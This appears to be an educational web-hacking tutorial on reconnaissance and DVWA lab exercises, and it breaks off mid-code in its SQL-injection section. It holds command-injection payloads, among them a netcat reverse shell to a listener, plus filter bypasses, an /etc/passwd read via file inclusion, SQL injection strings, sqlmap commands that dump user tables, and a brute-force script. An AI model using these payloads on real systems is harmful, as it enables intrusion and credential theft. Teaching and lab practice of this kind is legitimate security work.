Web Hacking Basics for Penetration Testing

The document provides an overview of web hacking basics, focusing on penetration testing techniques for identifying vulnerabilities in web applications. It covers tools and methods for exploring websites, analyzing page source, using developer tools, and conducting manual reconnaissance. Additionally, it discusses automated tools, brute forcing techniques, and command execution vulnerabilities, particularly within the context of the Damn Vulnerable Web Application (DVWA).

Uploaded by Memoona Asif

Web Hacking
@mmar

WEB HACKING
THE BASICS
Exploring The Website
• As a penetration tester, your role when reviewing a website or web application is to discover features that could potentially be vulnerable and attempt to exploit them to assess whether or not they are. These features are usually the parts of the website that involve some interaction with the user (forms, search boxes, file uploads, URL parameters)
• Finding the interactive portions of the website can range from as easy as spotting a login form to manually reviewing the website's JavaScript. An excellent place to start is simply exploring the website in your browser and noting down the individual pages/areas/features with a summary of each one
Page Source
• The page source is the human-readable code returned to our browser/client from the web server each time we make a request
• The returned code is made up of HTML (HyperText Markup Language), CSS (Cascading Style Sheets) and JavaScript; it tells our browser what content to display, how to show it, and adds interactivity through JavaScript
• Press CTRL+U to view the page source (F12 opens the developer tools instead, which show the live DOM rather than the raw response)
• The source code of a website sometimes provides useful information such as the framework used or left-over developer comments. We can sometimes find hidden links as well (commented-out pages, paths inside JavaScript, hidden form fields)
Developer Tools: Inspector
• Every modern browser includes developer tools; this is a tool kit used to aid web developers in debugging web applications and gives you a peek under the hood of a website to see what is going on. As a pentester, we can leverage these tools to gain a much better understanding of the web application
• The Inspector shows the live DOM, which can differ from the page source once JavaScript has modified the page. Elements can be edited in place, for example to remove a disabled attribute or a maxlength limit on a form field before submitting it

Developer Tools: Debugger/Sources
• This panel in the developer tools is intended for debugging JavaScript, and is another excellent feature for web developers wanting to work out why something might not be working. For penetration testers, it gives us the option of digging deep into the JavaScript code and setting breakpoints to watch client-side validation or the values about to be sent to the server. In Firefox and Safari this feature is called Debugger, but in Google Chrome it's called Sources
Manual Web Reconnaissance

AIM
• Find directories and pages of a website
• Find subdomains
• Find the technology stack used to build the site
[Link]
• The [Link] file is a document that tells search engine crawlers which pages they are and aren't allowed to crawl and show in their search results, or asks specific crawlers not to crawl the website at all. It is common practice to restrict certain website areas so they aren't displayed in search engine results; these pages may be areas such as administration portals or files meant for the website's customers
• The file is advisory: a crawler chooses whether to honour it, and anyone can read it. For a pentester it is therefore a free list of the paths the owner would rather nobody found

[Link]

[Link]
• The [Link] file gives a list of every file the website owner wishes to be listed on a search engine. It can sometimes contain areas of the website that are a bit more difficult to navigate to, or even list old webpages that the current site no longer links to but that are still working behind the scenes

[Link]
HTTP Headers
• When we make requests to the web server, the server returns various HTTP headers. These headers can sometimes contain useful information such as the web server software (Server) and possibly the programming/scripting language in use (X-Powered-By, or the name of the session cookie, e.g. PHPSESSID for PHP). The -v flag makes curl print both the request and the response headers

curl [Link] -v
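As an added example (not code from the slides), the following Python script does the two manual reconnaissance checks above offline: it parses a raw HTTP response the way you would read curl -v output and collects the Server, X-Powered-By, session-cookie and HTML-comment clues, and it pulls the Disallow entries out of a crawler-exclusion file. The response and the file are constructed samples, the host name is hypothetical, and the file name robots.txt is an assumption because the slide's link placeholder hides it.

```python
"""Manual reconnaissance helpers: fingerprint a server from its response
headers and list the "hidden" paths in a crawler-exclusion file.
Added example, not part of the original slides; the sample response and
file are constructed for the demo and the host name is hypothetical."""
import re

# Constructed raw HTTP response, as curl -v would show it (not a real server).
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.41 (Ubuntu)\r\n"
    "X-Powered-By: PHP/7.4.3\r\n"
    "Set-Cookie: PHPSESSID=abc123; path=/; HttpOnly\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html><!-- TODO: remove /backup before launch --></html>\r\n"
)

# Constructed exclusion file (robots.txt is assumed to be the file name the
# slide's link placeholder stands for).
SAMPLE_ROBOTS = """User-agent: *
Disallow: /admin/
Disallow: /backup/
Allow: /public/
Sitemap: https://example.invalid/sitemap.xml

User-agent: BadBot
Disallow: /
"""

# Session-cookie names that give away the server-side platform.
COOKIE_HINTS = {
    "PHPSESSID": "PHP",
    "JSESSIONID": "Java servlet container",
    "ASP.NET_SessionId": "ASP.NET",
    "connect.sid": "Node.js (Express)",
    "ci_session": "PHP (CodeIgniter)",
}


def parse_headers(raw: str) -> dict:
    """Split a raw response into the status line, a header dict (lower-cased
    keys; repeated headers joined with ', ') and the body."""
    head, _, body = raw.partition("\r\n\r\n")
    status, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        key = name.strip().lower()
        headers[key] = (headers[key] + ", " if key in headers else "") + value.strip()
    return {"status": status, "headers": headers, "body": body}


def fingerprint(raw: str) -> dict:
    """Collect technology clues: Server, X-Powered-By, session-cookie names
    and HTML comments left in the body."""
    parsed = parse_headers(raw)
    h = parsed["headers"]
    clues = {}
    if "server" in h:
        clues["server"] = h["server"]
    if "x-powered-by" in h:
        clues["powered_by"] = h["x-powered-by"]
    for cookie in h.get("set-cookie", "").split(", "):
        name = cookie.split("=", 1)[0].strip()
        if name in COOKIE_HINTS:
            clues["platform_from_cookie"] = f"{name} -> {COOKIE_HINTS[name]}"
    comments = re.findall(r"<!--(.*?)-->", parsed["body"], re.S)
    if comments:
        clues["html_comments"] = [c.strip() for c in comments]
    return clues


def disallowed_paths(robots: str) -> list:
    """Return the Disallow entries (deduplicated, in order): the paths the
    owner does not want indexed, i.e. the first places to look."""
    seen = []
    for line in robots.splitlines():
        field, _, value = line.partition(":")
        path = value.strip()
        if field.strip().lower() == "disallow" and path and path not in seen:
            seen.append(path)
    return seen


if __name__ == "__main__":
    print(fingerprint(SAMPLE_RESPONSE))
    print(disallowed_paths(SAMPLE_ROBOTS))
```

Feed fingerprint() the text of a saved curl -v response and disallowed_paths() the downloaded exclusion file; the Disallow list is what you try first in the directory-busting section later on.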
OSINT Websites

There are also external resources available that can help in discovering information about your target website; these resources are often referred to as OSINT (Open-Source Intelligence) as they're freely available tools that collect information

AIM
• Find directories and pages of a website
• Find subdomains
• Find the technology stack used to build the site
• Find email addresses / leaked credentials of the employees
Google Dorks
• Google hacking / dorking utilizes Google's advanced search engine features, which allow you to pick out custom content. You can, for instance, pick out results from a certain domain name using the site: filter

Filter     Example          Description
site       site:[Link]      returns results only from the specified website address
inurl      inurl:admin      returns results that have the specified word in the URL
filetype   filetype:pdf     returns results which are a particular file extension
intitle    intitle:admin    returns results that contain the specified word in the title
Finding Technology Stack
• Wappalyzer ([Link]) is an online tool and browser extension that helps identify what technologies a website uses, such as frameworks, Content Management Systems (CMS), payment processors and much more, and it can even find version numbers as well. BuiltWith is another online tool that provides the same functionality
• WhatWeb is a command line utility that provides the same information on the CLI
Way Back Machine
• The Wayback Machine is a historical archive of websites that dates back to the late 90s. You can search a domain name, and it will show you all the times the service scraped the web page and saved the contents. This service can help uncover old pages that may still be active on the current website.

[Link]

Automated tools
• We can use automated tools like Sublist3r, amass and theHarvester to automatically find subdomains of a website (theHarvester also collects email addresses for the domain)
Digital Certs search engines
Digital certificates are primarily used to ensure the security and authenticity of websites. They help to establish a secure connection between a user's browser and the website, by verifying that the website is legitimate (the certificate binds the hostname to a key vouched for by a certificate authority) and encrypting the data exchanged between the two parties.
Digital certificates can also be used to discover subdomains of a website. Every certificate lists the hostnames it covers in its Subject Alternative Name (SAN) extension, and publicly trusted certificate authorities must publish the certificates they issue to Certificate Transparency (CT) logs. Searching those logs for a domain therefore reveals every hostname (staging, internal or forgotten subdomains included) that was ever given a certificate. A wildcard entry such as *.[Link] hides the actual names beneath it, so CT search complements rather than replaces brute forcing.
[Link]
• Allows searching by domain name, organization name, etc

[Link]

Entrust cert search
• Allows searching on partial name matches as well as for expired certificates

[Link]

Censys
• Censys is a search engine for all internet connected devices and has a separate function to search digital certificates

[Link]
Directory Busting and VHOST Enumeration

AIM
• Dir Busting: find directories and pages of a website
• VHOST Enumeration: find subdomains (virtual hosts) of a website
GoBuster is an open-source directory and file brute-forcing tool written in the Go programming language. It discovers hidden files and directories on a web server by taking a list of possible directory and file names, requesting each one, and reporting those the server does not answer with 404.
FFUF is another tool that is becoming popular due to its speed and the flexibility it provides (its FUZZ keyword can be placed anywhere in the request: path, header or parameter)

Wordlists
• Wordlists are lists of words or phrases that are used in directory and VHOST brute-forcing to generate possible directory and VHOST names. These wordlists typically contain common words and phrases used in file and directory naming conventions, as well as common VHOST names and subdomains.
• We will be using SecLists for our lecture, which can be installed with the following command in Kali Linux or Parrot OS (the lists land under /usr/share/seclists)

sudo apt install seclists

DIR BUSTING
Dir Busting
Gobuster

gobuster dir -u [Link] -w /usr/share/wordlists/dirbuster/directory-list-[Link]

FFUF (the FUZZ keyword marks where each wordlist entry is inserted; ffuf refuses to run without it)

ffuf -u [Link]/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-[Link]

Finding Files
• We can specify extensions to search for files with those extensions in each directory
Gobuster

gobuster dir -u [Link] -w /usr/share/wordlists/dirbuster/directory-list-[Link] -x .html,.css,.js

• FFUF can also be used to brute force files
FFUF

ffuf -u [Link]/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-[Link] -e .html,.css,.js,.conf
VHOST ENUMERATION

VHOST Enumeration
• VHOST enumeration is the process of identifying virtual hosts (VHOSTs) on a web server. A virtual host is a method of hosting multiple domain names on a single web server. With name-based virtual hosting all of the sites share one IP address and port, and the server picks the site to serve from the Host header of each request. That is why VHOST enumeration works by sending requests to the same IP with candidate names in the Host header: sites that are not in public DNS (internal, staging, admin) still answer if the name is guessed
• VHOST enumeration is often used as part of the reconnaissance phase of a web application penetration test or vulnerability assessment. Attackers can use VHOST enumeration to identify all the virtual hosts on a web server, and then focus their efforts on those that may be vulnerable
• The server answers every unknown name with its default site, so note the response size of that default page and look for names whose response differs (ffuf can drop the default size with -fs; gobuster prints the size of each hit)

Gobuster

gobuster vhost -u [Link] -w /usr/share/seclists/Discovery/DNS/[Link] --append-domain

FFUF

ffuf -u [Link] -w /usr/share/seclists/Discovery/DNS/subdomains-[Link] -H "Host: FUZZ.[Link]"
DNS Enumeration

DNS enumeration, also known as DNS recon, is the process of gathering information about a domain name system (DNS) infrastructure and its associated records. DNS is responsible for translating human-readable domain names (e.g., [Link]) into machine-readable IP addresses (e.g., [Link]). DNS enumeration involves querying DNS servers to obtain various types of DNS records, which can reveal valuable information about the target domain including hidden or internal subdomains

The primary purpose of DNS enumeration is to gather intelligence about a target's DNS infrastructure. It can be used by security professionals, penetration testers, or malicious actors to identify potential vulnerabilities, misconfigurations, or targets for further attacks. By gathering information about the target's DNS infrastructure, an attacker can potentially identify subdomains, mail servers, or other potential entry points for further attacks.

Record Types
AXFR    Zone transfer. Returns every record in the zone, but only if the name server is misconfigured to allow transfers to arbitrary clients; a correctly configured server refuses the request
Dig
Most common DNS enumeration tool; the DNS enumeration swiss army knife

• Dig can be used for a simple domain lookup

>dig [Link]

• We can also specify the type of record with the dig command

>dig ns [Link]      (name servers)
>dig mx [Link]      (mail servers)
>dig cname [Link]   (CNAME record)
Installing DVWA on Kali Linux

DVWA, or Damn Vulnerable Web Application, is a web application intentionally designed to be vulnerable to various security vulnerabilities. It is often used as a training and learning tool to learn about web application security and for testing the effectiveness of web application security tools. DVWA contains several types of vulnerabilities, including:
• SQL injection
• File Inclusion
• Cross-Site Request Forgery (CSRF)
• Insecure Direct Object Reference

Step- 1
• We can simply install DVWA in an automated manner from the Kali repositories (apt package names are lower-case). Just use the following command

>sudo apt install dvwa

Step- 2
• Once DVWA is installed, you can use the following command to start it (it brings up the web server and the database behind it)

>dvwa-start

Step- 3
• Open the DVWA web interface in your browser and log in with the default credentials (admin/password). A setup page will open; scroll down and click "Create / Reset Database"

Step- 4
• Now you can access DVWA and start your web pentesting. DVWA is deliberately insecure, so keep it on a lab network and never expose it to the internet. Once done, you can stop DVWA with the following command

>dvwa-stop
Brute forcing

Brute forcing is a technique used in computer science to try a large number of possibilities, such as passwords or keys, in order to find the correct one. It involves trying every candidate until the correct one is found; against a login form the practical version is a dictionary attack, which tries a list of likely passwords rather than every combination. We will use Burp Suite and Hydra to brute force the login form provided by DVWA. In this challenge, we will test a password list against a known user and try to log in as that user

Low-difficulty DVWA brute forcing
Step- 1
• Go to DVWA security settings and set the difficulty to low

Step- 2
• Fire up Burp Suite in your Kali Linux. Set the proxy in Firefox to use Burp as a proxy. You can also use the FoxyProxy add-on to switch the Burp proxy on and off

Step- 3
• Submit a login request from Firefox with wrong credentials. The complete request will be shown in Burp. Now right-click on it and send it to the Intruder module. In the Intruder tab, clear all payload positions, locate the password parameter and mark its value as the single payload position (DVWA's brute force page submits the credentials as GET parameters, so they appear in the URL)

Step- 4
• Now in the Payloads tab, you can set the wordlist. I am using [Link]

Step- 5
• Now start the attack and Burp will try every password. Keep looking at the response length column: every failed attempt returns the same "Username and/or password incorrect." page, so the request/response with a different length is our matched password. Sort by length (or by status code, if the application redirects on success) to find it quickly
Medium-difficulty DVWA brute forcing

Medium Difficulty
• The medium difficulty challenge adds a delay after each failed attempt and can be solved in the same fashion, but the attack will be much slower. A shorter, better-chosen wordlist and several parallel threads are the usual answer (Burp Community edition throttles Intruder, so Hydra is faster here)

High-difficulty DVWA brute forcing

High Difficulty
• In high difficulty, a CSRF token (user_token) is generated for each request and must be sent back with the next login attempt, so replaying one captured request fails. Brute forcing is still possible, but every attempt has to fetch the form first and extract the fresh token: in Burp this is done with the Pitchfork attack type and a Recursive grep payload, or with a short script that performs the request pair itself
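The two ideas from the brute-forcing steps, success detection by a change in response length (Step 5 of the low level) and per-request token handling (the high level), in one Python script. This is an added example and not code from the slides or from DVWA: the HTTP layer is a callable so the demo runs offline against a constructed stand-in for DVWA's brute-force page (its messages and its user_token field are modelled on DVWA but the class is mine); to run it against a lab host, replace the callable with one that performs a real GET with a cookie jar.

```python
"""Login brute force against a form that embeds a fresh anti-CSRF token in
every page, detecting success by the change in response length.
Added example, not part of the original slides and not DVWA's code; the
FakeDvwa class is a constructed stand-in so the script runs offline."""
import re
import secrets
from typing import Callable, Tuple

TOKEN_RE = re.compile(r"name=['\"]user_token['\"]\s+value=['\"]([0-9a-f]+)['\"]")


class FakeDvwa:
    """Constructed imitation of DVWA's brute-force page: a fresh token is
    issued with every response and a login is only processed when the token
    of the previous response is echoed back."""

    def __init__(self, username: str, password: str):
        self.creds = (username, password)
        self.issued = None

    def _page(self, message: str) -> str:
        self.issued = secrets.token_hex(16)
        return (f"<html><body><p>{message}</p>"
                f"<form><input type='hidden' name='user_token' value='{self.issued}'/>"
                "</form></body></html>")

    def request(self, params: dict) -> str:
        if "Login" not in params:
            return self._page("")                      # plain fetch of the form
        if params.get("user_token") != self.issued:
            return self._page("CSRF token is incorrect")
        if (params.get("username"), params.get("password")) == self.creds:
            return self._page("Welcome to the password protected area admin")
        return self._page("Username and/or password incorrect.")


def extract_token(html: str) -> str:
    m = TOKEN_RE.search(html)
    if not m:
        raise ValueError("no user_token in page")
    return m.group(1)


def attempt(request: Callable[[dict], str], user: str, pwd: str) -> str:
    """One login attempt: fetch the form, read its token, submit with it."""
    token = extract_token(request({}))
    return request({"username": user, "password": pwd,
                    "Login": "Login", "user_token": token})


def brute_force(request: Callable[[dict], str], user: str, wordlist,
                baseline_pwd: str = "!!not-a-real-password!!") -> Tuple[str, int]:
    """Try each candidate and return (password, response_length) for the
    first response whose length differs from a known-bad baseline, or
    ('', baseline_length) if none did. Length rather than string matching is
    used so the same code works on any form whose failure page is constant."""
    baseline = len(attempt(request, user, baseline_pwd))
    for pwd in wordlist:
        body = attempt(request, user, pwd)
        if len(body) != baseline:
            return pwd, len(body)
    return "", baseline


if __name__ == "__main__":
    target = FakeDvwa("admin", "password")
    print(brute_force(target.request, "admin", ["123456", "letmein", "password", "admin"]))
```

Because the token is re-read before every attempt, the same loop works at the low level (where the token is simply absent from the request DVWA checks) and at the high level; the medium level's delay only slows it down.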
Command Execution

Some websites allow you to execute commands through a web interface, typically to generate some report or run a network utility. DVWA provides a command execution module which you can use to ping IP addresses; behind the form the application builds a shell command string with the submitted value inside it. Our goal is to find a way to execute other commands from the same text box.

Low-difficulty DVWA Command Execution
Step- 1
• Go to DVWA security settings and set the difficulty to low

Step- 2
• There are multiple ways to chain a second command onto the ping from the same text box, because the input reaches the shell unfiltered. The following inputs all work; the shell operator decides whether ls runs after a successful ping (&&), in parallel with it (&), unconditionally (;) or with ping's output piped into it (|). The last example turns the same bug into a reverse shell to a listener on port 9001

[Link] && ls
[Link] & ls
[Link] ; ls
[Link] | ls
[Link] && nc -c sh [Link] 9001
Medium-difficulty DVWA Command Execution

Medium Difficulty
• Some input sanitisation is performed: the strings && and ; are stripped from the input with str_replace. A blacklist is not a whitelist, so a separator it does not list still works
[Link] | ls

High-difficulty DVWA Command Execution

High Difficulty
• Even | is blacklisted, along with &, ;, - and several other characters, but the entry for the pipe is written as "| " (pipe followed by a space). The replacement only removes a pipe that has a space after it, so entering the pipe with no space behind it survives the filter and the command runs
[Link] |ls
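To make the medium and high bypasses above concrete, here is an added Python model (not DVWA's code) of the three blacklists: the substitution tables are transcribed from DVWA's PHP str_replace() calls (assumed to match the current upstream version, and the ping template is assumed from its Linux branch). Nothing is executed; a small splitter reports which commands a POSIX shell would see after the filter, which is enough to show why `&&&` beats the medium filter and `|ls` beats the high one.

```python
"""Model of the DVWA command-injection blacklists at the three difficulty
levels. Added example, not DVWA's code: the substitution tables are
transcribed from DVWA's str_replace() calls (assumption: current upstream),
and the 'shell' only reports how a command line would be split, it runs
nothing."""
import re

LOW = {}                                   # low: no filtering at all
MEDIUM = {"&&": "", ";": ""}               # medium: only '&&' and ';' removed
HIGH = {"&": "", ";": "", "| ": "", "-": "", "$": "", "(": "", ")": "",
        "`": "", "||": ""}                 # high: note the trailing space in '| '


def php_str_replace(subs: dict, text: str) -> str:
    """str_replace(array_keys($subs), $subs, $text): one left-to-right pass
    per key, in array order, with no re-scan of the result."""
    for needle, repl in subs.items():
        text = text.replace(needle, repl)
    return text


def shell_commands(line: str) -> list:
    """Split a command line on the POSIX control operators ;, &, &&, | and ||
    and return the resulting simple commands."""
    parts = re.split(r"\s*(?:\|\||&&|[;&|])\s*", line)
    return [p for p in parts if p]


def injected_commands(subs: dict, user_input: str,
                      template: str = "ping -c 4 {}") -> list:
    """Apply the filter, build the command the application would run, and
    return every command other than the intended ping."""
    filtered = php_str_replace(subs, user_input)
    full = template.format(filtered)
    return [c for c in shell_commands(full) if not c.startswith("ping")]


if __name__ == "__main__":
    payloads = ("127.0.0.1 && ls", "127.0.0.1 ; ls", "127.0.0.1 | ls",
                "127.0.0.1 &&& ls", "127.0.0.1 |ls")
    for name, subs in (("low", LOW), ("medium", MEDIUM), ("high", HIGH)):
        for payload in payloads:
            print(f"{name:6} {payload!r:22} -> {injected_commands(subs, payload)}")
```

The `&&&` case shows the second weakness of single-pass str_replace(): removing the listed `&&` from `&&&` leaves a lone `&`, which the medium filter never looks for.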
CSRF Attack

CSRF stands for Cross-Site Request Forgery. It is a type of attack that occurs when a malicious web site, email, or blog causes a user's web browser to perform an unwanted action on a trusted site for which the user is currently authenticated. The browser attaches the user's session cookie to the forged request automatically, so the trusted site cannot tell it apart from one the user meant to send. The attack can be used to transfer funds, change account information, or perform other malicious actions

Step- 1
• Go to DVWA security settings and set the difficulty to low

Step- 2
• Try to change the password. Once you click on Change, you will see the notification that the password has been changed. Now look at the URL: the new password travels as GET parameters, and nothing in the request ties it to the form the user actually filled in. You can send this URL to another authenticated user in an email or by any other method. Whenever they click on it, their password will be changed, and because we set the password in the URL, we know it
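The password-change flow above, as an added Python example (not DVWA's code): a handler that trusts any request carrying the session cookie, the way the low level does, next to a hardened one that insists on POST, a per-session anti-CSRF token compared in constant time, and a matching Origin. Requests are plain dicts constructed for the demo and the site origin is hypothetical.

```python
"""Password-change handler, vulnerable (any request with the session cookie
is trusted) beside a hardened version. Added example, not DVWA's code; the
request objects are constructed dicts and the origin is hypothetical."""
import hmac
import secrets

SITE_ORIGIN = "https://dvwa.lab.invalid"                       # hypothetical
sessions = {"s1": {"user": "admin", "csrf": secrets.token_hex(16)}}
passwords = {"admin": "password"}


def session_for(request: dict):
    return sessions.get(request.get("cookies", {}).get("PHPSESSID"))


def change_password_vulnerable(request: dict) -> str:
    """Low difficulty: cookie plus parameters is enough, so a link in an
    e-mail or an <img src=...> on any site triggers the change."""
    sess = session_for(request)
    if sess is None:
        return "login required"
    p = request["params"]
    if p.get("password_new") != p.get("password_conf"):
        return "passwords did not match"
    passwords[sess["user"]] = p["password_new"]
    return "password changed"


def change_password_hardened(request: dict) -> str:
    """State changes only via POST, only with this session's own token
    (constant-time compare) and only from our own origin."""
    sess = session_for(request)
    if sess is None:
        return "login required"
    if request.get("method") != "POST":
        return "method not allowed"
    origin = request.get("headers", {}).get("Origin")
    if origin is not None and origin != SITE_ORIGIN:
        return "cross-site request rejected"
    token = request["params"].get("user_token", "")
    if not hmac.compare_digest(token, sess["csrf"]):
        return "csrf token invalid"
    p = request["params"]
    if p.get("password_new") != p.get("password_conf"):
        return "passwords did not match"
    passwords[sess["user"]] = p["password_new"]
    return "password changed"


def forged_request(new_password: str, method: str = "GET") -> dict:
    """What the victim's browser sends when it follows the attacker's link
    (GET) or an auto-submitting form on the attacker's page (POST): the
    attacker picks the parameters, the browser adds the victim's cookie.
    Browsers send Origin on cross-site POSTs, not on link navigations."""
    headers = {"Origin": "https://attacker.invalid"} if method == "POST" else {}
    return {"method": method, "headers": headers,
            "cookies": {"PHPSESSID": "s1"},
            "params": {"password_new": new_password,
                       "password_conf": new_password, "Change": "Change"}}


if __name__ == "__main__":
    print(change_password_vulnerable(forged_request("pwned")), passwords)
    print(change_password_hardened(forged_request("pwned2")), passwords)
    print(change_password_hardened(forged_request("pwned3", "POST")), passwords)
```

The token is the defence that works everywhere; the Origin check is a cheap second layer for browsers that send the header, and switching to POST removes the "password in a clickable link" problem the slide exploits.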
File Inclusion

A file inclusion vulnerability allows an attacker to make the application include a file whose name comes from user input (usually a URL parameter passed to a script on the web server) without proper validation. Because the included file is handed to the interpreter, this can let an attacker execute arbitrary code, including PHP code, on the server, potentially leading to server compromise. There are two main types of file inclusion vulnerabilities:
• Local file inclusion (LFI) allows an attacker to include files that are stored locally on the server
• Remote file inclusion (RFI) allows an attacker to include files from a remote server, such as through a URL (in PHP this requires allow_url_include, which is off by default)

Step- 1
• Go to DVWA security settings and set the difficulty to low

Step- 2
• Click on the first file. We can see that the file name is included in the URL as a parameter. Now we can supply the name of any file on the system to open it. For example, point the parameter at the system's /etc/passwd file (walking up with ../ if the include path is relative to the application directory) and the list of local user accounts is displayed in the page
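An added Python example (not DVWA's code) of the include step above and of what the check should have been: the unchecked function opens whatever name it is given, like the low-level page; the hardened one refuses URL wrappers, keeps the resolved path inside the page directory and requires the name to be on an allowlist. The page directory and the "secret" file outside it are created in a temporary location for the demo, and the allowed page names are an assumption.

```python
"""Resolving a user-supplied file name safely. Added example, not DVWA's
code; the directories are temporary ones created for the demo and the
allowlist of page names is assumed."""
import os
import tempfile

ALLOWED = {"file1.php", "file2.php", "file3.php"}   # assumed page names


def make_demo_root() -> str:
    """Create <tmp>/app holding the allowed pages and <tmp>/secret.txt
    beside it, standing in for a file the page must never reach."""
    outer = tempfile.mkdtemp(prefix="fi_demo_")
    root = os.path.join(outer, "app")
    os.mkdir(root)
    for name in ALLOWED:
        with open(os.path.join(root, name), "w") as fh:
            fh.write(f"<?php /* {name} */ ?>")
    with open(os.path.join(outer, "secret.txt"), "w") as fh:
        fh.write("top secret")
    return root


def include_vulnerable(root: str, page: str) -> str:
    """include($_GET['page']) with no checks: ../ walks out of root and
    os.path.join discards root entirely for an absolute path."""
    with open(os.path.join(root, page)) as fh:
        return fh.read()


def resolve_page(root: str, page: str) -> str:
    """Return the real path of `page` or raise ValueError. Three checks:
    no URL wrappers (blocks RFI and php://filter), the resolved path must
    stay under root (blocks ../ and absolute paths), and the name must be
    on the allowlist (blocks arbitrary files that live under root)."""
    if "://" in page or page.startswith("php:"):
        raise ValueError("wrappers are not allowed")
    base = os.path.realpath(root)
    target = os.path.realpath(os.path.join(base, page))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes the include directory")
    if os.path.relpath(target, base) not in ALLOWED:
        raise ValueError("page not on the allowlist")
    return target


def include_hardened(root: str, page: str) -> str:
    with open(resolve_page(root, page)) as fh:
        return fh.read()


if __name__ == "__main__":
    root = make_demo_root()
    print("vulnerable:", include_vulnerable(root, "../secret.txt"))
    for p in ("file1.php", "../secret.txt", "/etc/passwd",
              "http://evil.invalid/shell.txt", "file1.php/../../secret.txt"):
        try:
            print(p, "->", include_hardened(root, p))
        except ValueError as e:
            print(p, "-> rejected:", e)
```

The allowlist is the check that matters most: realpath() stops traversal, but a page that may include any file under the web root still leaks configuration files and uploaded content.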
SQL Injection

SQL injection is a type of attack in which an attacker injects malicious input into a website's SQL statement and gains access to sensitive information or performs malicious actions on the database. This is typically done by manipulating input fields in a web application that is connected to a database, such as a login form or a search box, in such a way as to trick the application into executing unintended SQL commands. The root cause is that the application builds the query by concatenating strings, so the database cannot tell the developer's SQL from the user's data
SQL injection attacks can allow attackers to bypass authentication; access, modify, or delete sensitive data; or even execute commands on the operating system. They can also be used to create new user accounts with high privileges or to perform other malicious actions

What are SQL Queries?
• SQL is a standardized language used to access and manipulate databases and to build customizable data views for each user
• SQL queries are used to execute commands, such as data retrieval, updates and record removal
• E.g., queries using the SELECT statement retrieve data based on user-provided parameters
SQL Injection
• Consider a web application that enables users to search for a book based on the title, author, publisher and so on
• The entire book catalogue is held within a database, and the application uses SQL queries to retrieve details of different books based on the search terms supplied by users

Case 1: User searches for all books published by Iqbal

Query: SELECT author,title,year FROM books WHERE publisher = 'Iqbal'

In response, the database checks every row within the books table, and returns all records where the publisher column has the value Iqbal.

• Case 2: User searches for all books published by Al' Qutb (a name containing an apostrophe). The application performs the following query:
SELECT author, title, year FROM books WHERE publisher = 'Al' Qutb'
• In this case, the query interpreter reads the value Al and then generates a SQL syntax error for the trailing Qutb':
Incorrect syntax near 'Qutb''.
Server: Msg 105, Level 15, State 1, Line 1
Unclosed quotation mark before the character string '
• An error like this on a search page is the first sign that user input is being parsed as SQL

• Case 3: If the user enters the search term Iqbal' OR 1=1--, the query will be
SELECT author, title, year FROM books WHERE publisher = 'Iqbal' OR 1=1--'
• This will return every single book in the retailer's catalogue.
• In this case, a second condition has been added to the WHERE clause of the developer's query. The database will extract each record where the publisher column has the value Iqbal or where 1 is equal to 1. Because 1 is always equal to 1, the database will return every record within the books table.
• The double hyphen -- tells the query interpreter that the remainder of the line is a comment and should be ignored, which disposes of the developer's closing quote (MySQL only treats -- as a comment when a space follows it)

• Case 4: If the user enters the search term Iqbal' OR 'a' = 'a, the query will be
Query: SELECT author, title, year FROM books WHERE publisher = 'Iqbal' OR 'a'='a'
• This example balances the trailing quotation mark without using the comment symbol, by concluding the injected input with an item of string data that requires a trailing quote to encapsulate it

SQL Injection (Login Pages)
• Case 1: User inputs his username ABC and password XYZ on the login page; the SQL query for this will be
SELECT * FROM users WHERE username = 'ABC' AND password = 'XYZ'
• This query causes the database to check every row within the users table and extract each record where the username column has the value ABC and the password column has the value XYZ
• If a user's details are returned to the application, then the login attempt is successful, and the application creates an authenticated session for that user

• Case 2: Suppose the attacker knows the username of a real user; then he can type username'-- in the username field to bypass the password check altogether. The SQL query for this will be
SELECT * FROM users WHERE username = 'username'--' AND password = 'XYZ'
• Because of the comment symbol, the above query is equivalent to:
SELECT * FROM users WHERE username = 'username'
• The fix is not to filter quotes but to stop concatenating: a parameterised (prepared) query sends the SQL text and the values separately, so user input can never change the structure of the statement
Step- 1
• Go to DVWA security settings and set the difficulty to low

Step- 2
• If we put an injection like the one in Case 3 above into the User ID box, the page lists every user's information instead of the single record requested

Step- 3
• We can manually craft more complex queries to list all information, but we are going to use sqlmap to automate the process. First of all intercept a normal request with Burp and save it to a text file. Now launch sqlmap with the following command (-r replays the saved request, so the session and security-level cookies go with it)

>sqlmap -r [Link] --dbs

Step- 4
• It will list all databases available. Now to get more information about the tables of a particular database, we can use the following command
>sqlmap -r [Link] -D dvwa --tables

Step- 5
• You can get column information of tables with the following command

>sqlmap -r [Link] -D dvwa -T users --columns

Step- 6
• Now we can dump the table's contents with the following command (--dump-all would dump every database, ignoring the one selected with -D)

>sqlmap -r [Link] -D dvwa -T users --dump
Blind SQL Injection

Blind SQL injection is nearly identical to normal SQL injection, the only difference being the way the data is retrieved from the database.
When the database does not output data to the web page, an attacker is forced to extract data by asking the database a series of true or false questions: either the page looks different depending on the answer (boolean-based), or the query is told to sleep when the answer is true and the delay is measured (time-based)
This makes exploiting the SQL injection vulnerability more difficult, but not impossible; tools such as sqlmap automate the character-by-character extraction
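The book-catalogue cases (1 to 4), the login-page cases and the blind technique above, run for real against an in-memory SQLite database as an added Python example (not code from the slides): the vulnerable string-concatenated queries, their parameterised replacements, and a boolean-based blind extraction that recovers a password one character at a time using nothing but "did the search return anything". The table contents are constructed.

```python
"""The slides' catalogue and login queries against a real (in-memory
SQLite) database, vulnerable and parameterised, plus boolean-based blind
extraction. Added example, not part of the slides; data is constructed."""
import sqlite3
import string

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE books(author TEXT, title TEXT, year INT, publisher TEXT);
INSERT INTO books VALUES ('A. Khan', 'Verses', 1990, 'Iqbal'),
                         ('B. Ali', 'Deserts', 2001, 'Iqbal'),
                         ('C. Noor', 'Rivers', 2010, 'Al'' Qutb');
CREATE TABLE users(username TEXT, password TEXT);
INSERT INTO users VALUES ('admin', 's3cret'), ('bob', 'hunter2');
""")


def search_vulnerable(publisher: str) -> list:
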